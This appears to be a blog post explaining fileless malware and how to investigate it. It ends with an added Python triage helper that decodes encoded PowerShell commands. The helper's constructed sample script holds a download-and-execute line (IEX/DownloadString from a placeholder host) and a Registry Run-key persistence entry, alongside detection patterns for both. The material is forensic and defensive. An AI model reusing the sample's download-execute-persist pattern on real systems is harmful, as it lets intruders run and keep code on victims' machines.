What is Fileless Malware?
Fileless malware was initially understood to be malicious software that exists exclusively in computer memory, leaving no evidence of its presence in storage whatsoever.
How is Fileless Malware Delivered?
Fileless malware can be delivered by various means, such as:
- Phishing and social engineering
- Malicious browser extensions
- Operating system exploits that allow malicious code to be delivered straight into memory
Popular Fileless Malware
Some popularly known fileless malware families include:
- Duqu 2.0: The Duqu 2.0 malware was detected by Kaspersky researchers, who discovered that it had gone undetected on the network for six months.
- Meterpreter: This is widely known and used by security experts who are familiar with the Metasploit Framework, and the bad guys also use Meterpreter in exploits to gain remote control of computer systems. Meterpreter runs only in memory, and it can be delivered remotely via known exploits in the operating system.
The definition of fileless malware has since broadened a little: it now also covers abusing operating system resources to perform malicious actions.
This definition mostly applies to the Windows operating system, because the resources abused are usually PowerShell and Windows Management Instrumentation (WMI). It is the definition many experts are accustomed to, and the major assertion now is that PowerShell attacks are fileless attacks.
These PowerShell attacks usually involve obfuscated scripts (though not always) written in files with the “.ps1” extension. Does the existence of a script file not erase the “fileless” aspect of the malware?
Sometimes a small PowerShell script is delivered to the target system, and that short script downloads a much larger malware script hosted somewhere on the internet. The malware code does not reside on the system’s storage, but if a proper investigation is carried out the malware script can be traced from the short script, unless perhaps it has been removed from the internet.
To maintain persistence, fileless malware alters the Windows Registry, Startup folders and other files and folders that help it achieve its goal, thereby leaving artifacts in system storage that make investigation easier for forensic experts.
Investigation of Fileless Malware
- Investigating fileless malware can be very cumbersome because of its absence from storage, so the first thing to do is to acquire a memory dump of the system, because memory is volatile and its contents are easily lost when the system is restarted.
- Checking the integrity of the Registry and the Startup folder may reveal more information if the malware tries to maintain persistence or carries out storage-intensive actions.
- A network capture is important in the investigation of fileless malware, but it is rarely available because individuals and organizations rarely capture and store network packets. The network traffic will show how the malware was delivered and will possibly show all the communication that occurred, in readable form if it is not encrypted.
- PowerShell scripts are quite easy to investigate because the commands are written in plain text, so a forensic expert who understands PowerShell scripting can read through the script, understand the malware’s intentions, see all the actions it carried out (including alterations to the registry, files and folders) and attempt to reverse those actions.
- In some cases the script files are encoded, mostly in base64; these can be easily decoded with one of the many base64 decoders available on the internet.
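As an added example (not code from the original post), here is a small Python triage helper for the last two investigation steps above: it decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE text, so a generic base64 decoder shows interleaved NUL bytes rather than readable script) and then flags the downloader and Registry-persistence behaviour described earlier. The sample command line, the indicator names and the URL are constructed placeholders, not real malware.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample script (benign placeholders, not real malware): a short
# "downloader" of the kind the post describes, plus a Run-key persistence entry.
SAMPLE_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1'); "
    "New-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name Updater -Value 'powershell -w hidden'"
)

# PowerShell's -EncodedCommand expects base64 of the UTF-16LE script, not UTF-8.
def encode_command(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed command line, as it might appear in a process listing or memory strings.
SAMPLE_COMMAND_LINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_command(SAMPLE_SCRIPT)
)

# -EncodedCommand and its short aliases, followed by the base64 blob.
ENCODED_FLAG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script from an -EncodedCommand argument, or None if absent."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    raw = base64.b64decode(match.group(1))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Truncated capture (odd byte count) or a non-PowerShell encoder: best effort.
        return raw.decode("utf-8", errors="replace")

# Heuristic indicators tied to the behaviours the post describes (assumed names).
INDICATORS: Dict[str, re.Pattern] = {
    "download_to_memory": re.compile(r"DownloadString|Invoke-Expression|\bIEX\b|Invoke-WebRequest", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run", re.I),
    "startup_folder": re.compile(r"\\Start Menu\\Programs\\Startup", re.I),
}

def triage(script: str) -> Dict[str, bool]:
    """Flag which of the described behaviours the decoded script exhibits."""
    return {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}

def extract_urls(script: str) -> List[str]:
    """URLs the short script reaches out to, i.e. where the larger stage is hosted."""
    return re.findall(r"https?://[^\s'\")]+", script)
```

Calling decode_encoded_command(SAMPLE_COMMAND_LINE) recovers SAMPLE_SCRIPT, and triage() on that text reports the in-memory download and Run-key persistence while extract_urls() lists the hosting URL to trace.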
While fileless malware truly exists, security companies and vendors now abuse the concept to put fear into the hearts of potential clients and the public, making it more of a “hype” word, just like Artificial Intelligence (a topic for another day). This abuse of the concept is distracting security experts and researchers from the real problem in front of us.
I agree that fileless malware is malware that is delivered directly to the system memory. I don’t believe PowerShell scripts run from files stored on computers’ storage are fileless malware.
What do you think? Share your thoughts with us via the comment section.